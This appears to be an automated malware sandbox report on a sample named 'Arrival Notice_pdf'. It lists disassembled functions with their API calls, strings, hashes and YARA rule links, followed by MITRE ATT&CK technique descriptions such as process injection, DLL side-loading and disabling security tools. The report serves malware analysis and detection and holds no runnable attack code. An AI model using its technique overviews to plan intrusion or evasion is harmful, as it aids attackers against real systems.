Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002A9699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002A96A8

Strings

edit, xrefs: 002A967D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: ab0d869845d02ef06e08df969d9c9ffa96e98e0f3e4968698ba9a89a3d80f859
Instruction ID: 8a0c6b7b3e3b39d308f43336d0cffc4c59c122615dfc5e20c327528e82bdb1ad
Opcode Fuzzy Hash: ab0d869845d02ef06e08df969d9c9ffa96e98e0f3e4968698ba9a89a3d80f859
Instruction Fuzzy Hash: 08119A71120109ABEB105F65EC44EEB3B6EEF067A8F104324FA64931E0CB719CA09B60

Function 00285262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002852D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002852F4

Strings

0, xrefs: 002852CE

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: df081f6f4c3754daa139eaa16e95357d92b8df971b93ba55cea16226c8414097
Instruction ID: 244f1dd76b0f8ee9078ebd30d091bdb74041ff245db3df51e3d150c10ded9ca2
Opcode Fuzzy Hash: df081f6f4c3754daa139eaa16e95357d92b8df971b93ba55cea16226c8414097
Instruction Fuzzy Hash: 8E11227AD23625EBDB21EFA8D844B9E77B8AF05790F040061E801E72D4D7B0EE14CB91

Function 00294D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00294DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00294E1E

Strings

<local>, xrefs: 00294DE6

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 2aff14314276e46947ce4c9fa32c05684da8606df127e386a5fe51d040a85b33
Instruction ID: 6cfe2756a6c9fb5b09ba63c6c8e94544a1d08a6c4a7bdf7bc0983ef5d0c6c662
Opcode Fuzzy Hash: 2aff14314276e46947ce4c9fa32c05684da8606df127e386a5fe51d040a85b33
Instruction Fuzzy Hash: 6111A074521222BBDF259F51C888EFBFBA8FF06755F10822AF54556140D3B05966C6F0

Function 0026A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002737A7
___raise_securityfailure.LIBCMT ref: 0027388E

Strings

(0, xrefs: 00273889

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (0
API String ID: 3761405300-1516798123
Opcode ID: 6fcbdd458a01597af380318d501a577faa66f52d7f37a59af46f8410290f172b
Instruction ID: 0ca90e756967998a140fe18eea38258520c87d242b1f7ed11032ec38dc7c7174
Opcode Fuzzy Hash: 6fcbdd458a01597af380318d501a577faa66f52d7f37a59af46f8410290f172b
Instruction Fuzzy Hash: 7D2139F5512704CAD70ADF68F9A97407BF8BB48310F10982BE508A73A0E7F06990CF49

Function 0029A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0029A84E
htons.WSOCK32(00000000,?,00000000), ref: 0029A88B

Strings

255.255.255.255, xrefs: 0029A866

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 9cf286b44837187c3716c54b18f67afacba6512e3303542354ad322961c3f326
Instruction ID: c8a8b77eef172cb7d1678dd170cdeaab48a495eb2fa58a1ccaea2e8f0c4c061e
Opcode Fuzzy Hash: 9cf286b44837187c3716c54b18f67afacba6512e3303542354ad322961c3f326
Instruction Fuzzy Hash: BC01D275210305ABCB11AF68D88AFA9B364FF45314F20842AF5169B3D1D771E8258B92

Function 00246430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00243DEE,00301148,?,?,?,?,?,00243AA3,?), ref: 00246471
_wcscat.LIBCMT ref: 002B5DDB

Strings

0, xrefs: 0024648B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: FullNamePath_wcscat
String ID: 0
API String ID: 2109976907-3684773922
Opcode ID: d2fc6fd3e2ddbba95b2d30bc03b523e77a5d9a1a34eeb260a2b0b614726b7da3
Instruction ID: 7caf6817147de93f36afcee5b4b2afcc64fef03d9f2e331cde2e5004dec24b70
Opcode Fuzzy Hash: d2fc6fd3e2ddbba95b2d30bc03b523e77a5d9a1a34eeb260a2b0b614726b7da3
Instruction Fuzzy Hash: BA110431620119ABCF59FBA8C949ECD73FDAF09340F0041A6B589D7280DA70D7A88F22

Function 0027B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0027B7EF

Strings

ComboBox, xrefs: 0027B78B
ListBox, xrefs: 0027B7B9

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 067de436d233ccc7a3ed7d1de819545f8e3e5fa291f54d55951715ea5e58912d
Instruction ID: c3f553ddd4ae4458e0de0a69aa69f191435a502870b66bbd89427da811287365
Opcode Fuzzy Hash: 067de436d233ccc7a3ed7d1de819545f8e3e5fa291f54d55951715ea5e58912d
Instruction Fuzzy Hash: 7F012471621118ABCB49EFA8CC52EFE7379BF06350B14461CF462672D2EFB058288B90

Function 0027B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0027B6EB

Strings

ComboBox, xrefs: 0027B687
ListBox, xrefs: 0027B6B5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 61757efb50a5838e4b98683efc58c42d0f7d572d9ba8618be9ce1dbcc02ea734
Instruction ID: 7a919fc50717517061976e6e69c0733a3e670e67f2989ca843b24601cb9ff9b2
Opcode Fuzzy Hash: 61757efb50a5838e4b98683efc58c42d0f7d572d9ba8618be9ce1dbcc02ea734
Instruction Fuzzy Hash: 47018871661008ABC749EB64C956BFE73AC9F06344B204029B60673291DBA05E288BA5

Function 0027B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0027B76C

Strings

ComboBox, xrefs: 0027B70A
ListBox, xrefs: 0027B738

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: d79ee11be989d8a58bb89db64ed5c36cbc63dd64bea5589614036b8e5878cfd2
Instruction ID: f45c08346b5369ff0721feddcdedeacadccb17837f16af5e5fadae85e37c78a3
Opcode Fuzzy Hash: d79ee11be989d8a58bb89db64ed5c36cbc63dd64bea5589614036b8e5878cfd2
Instruction Fuzzy Hash: CB01DB72661109ABC709EBA4D913FFEB3AC9F05344F604029B50573291DB705E398BB5

Function 00264D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00264D9E
__calloc_crt.LIBCMT ref: 00264DB7

Strings

"0, xrefs: 00264DCE

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __calloc_crt
String ID: "0
API String ID: 3494438863-1700454928
Opcode ID: 53f92819f947edecae10230b75d951602e727777787a1d745a9e3a1ce96e8a5e
Instruction ID: 952266e9c01acdb21e4ecbb9a1b49de891336f47c6650f883736257532057a40
Opcode Fuzzy Hash: 53f92819f947edecae10230b75d951602e727777787a1d745a9e3a1ce96e8a5e
Instruction Fuzzy Hash: ABF0FC7163A702DAE756AF59BC5576767DCF704760F10092FF204CA184E770C8D18B94

Function 00244024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00240000,00000063,00000001,00000010,00000010,00000000), ref: 00244048
EnumResourceNamesW.KERNEL32(00000000,0000000E,002867E9,00000063,00000000,75C10280,?,?,00243EE1,?,?,000000FF), ref: 002B41B3

Strings

>$, xrefs: 00244028

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >$
API String ID: 1578290342-2583128880
Opcode ID: b8275dde0adbcc641adb58f4b47fb87082e8e6cd8041c72980bb48c9c731ee1c
Instruction ID: bc833155118820c545996b85d34eae67cde9c7cdd299ecd8ef2023766dee4b23
Opcode Fuzzy Hash: b8275dde0adbcc641adb58f4b47fb87082e8e6cd8041c72980bb48c9c731ee1c
Instruction Fuzzy Hash: C5F09031662315B7E2255F1ABC5AFD33BADE709BB5F10010BF614EA1D0D2F090908BA0

Function 00287744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00287762
_wcscmp.LIBCMT ref: 00287774

Strings

#32770, xrefs: 0028776E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 20288a4aaac63d9dd91b430b0ea7c00d69fb6bb0943e5d1b17ecf66fd6e353c7
Instruction ID: 3f7ee1fb7b08fc474732034ad975495e9d67b26f6780d25104b511f251ed92c1
Opcode Fuzzy Hash: 20288a4aaac63d9dd91b430b0ea7c00d69fb6bb0943e5d1b17ecf66fd6e353c7
Instruction Fuzzy Hash: 42E0D87B60432927D710EAA5EC49FD7FBACEB51760F10006AF905D3081D670E651CBD4

Function 0027A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0027A63F

Part of subcall function 002613F1: _doexit.LIBCMT ref: 002613FB

Strings

Error allocating memory., xrefs: 0027A638
AutoIt, xrefs: 0027A633

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: c9e22bd6226d29623e00178b64572aef1f2e8067848082dc0d89bbcd1d7174b8
Instruction ID: 25c4f56e7bfeca644e9fe9ba0bb8050891f3890a98faa89518c576a07464744a
Opcode Fuzzy Hash: c9e22bd6226d29623e00178b64572aef1f2e8067848082dc0d89bbcd1d7174b8
Instruction Fuzzy Hash: 00D02B323E032833C2143AA83C0BFCC754C8B06BA5F140032BB4C965C249E3DDB041D9

Function 002BAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 002BACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 002BAEBD

Strings

WIN_XPe, xrefs: 002BACD3

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: c4b0b67973bdfd359ae0a38b35d3ec26b0cbd7b2bba5ad875e52c824bb6d0697
Instruction ID: 6c4c4c51d9a84aac7afe64852192b4b68dff74f7586ad46f0924063c8dd53d1c
Opcode Fuzzy Hash: c4b0b67973bdfd359ae0a38b35d3ec26b0cbd7b2bba5ad875e52c824bb6d0697
Instruction Fuzzy Hash: 05E03970C20149AFCB11DFA4D9489ECFBB8AB48341F148097E402B2160DBB04A94DF22

Function 002A8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002A86A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002A86B5

Part of subcall function 00287A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00287AD0

Strings

Shell_TrayWnd, xrefs: 002A869B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 379d7e8440c33bea41a7c7bd9cbbb4ad807386efe10707e8a74a95c9ee9da28e
Instruction ID: e818613115bd8702c5373997868e925715bffd0d5936a6907e081f74ccae5c0b
Opcode Fuzzy Hash: 379d7e8440c33bea41a7c7bd9cbbb4ad807386efe10707e8a74a95c9ee9da28e
Instruction Fuzzy Hash: 9BD02231394318B7E228B770BC4FFC6BA089B48B10F200824B309AA1C0C8F0E950CB10

Function 002A86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002A86E2
PostMessageW.USER32(00000000), ref: 002A86E9

Part of subcall function 00287A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00287AD0

Strings

Shell_TrayWnd, xrefs: 002A86DB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 22a6db5f1fd6e7e7a5f786c98170f259f63f129c9e99a49ce3edc79c248e88b9
Instruction ID: 2b4a3441d31b9303331084c2a23161f685f3aefeac45477e6463362a23cdb9fc
Opcode Fuzzy Hash: 22a6db5f1fd6e7e7a5f786c98170f259f63f129c9e99a49ce3edc79c248e88b9
Instruction Fuzzy Hash: 65D022313813187BF228B770BC4FFC6BA089B48B10F600824B305EA1C0C8F0E950CB14

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

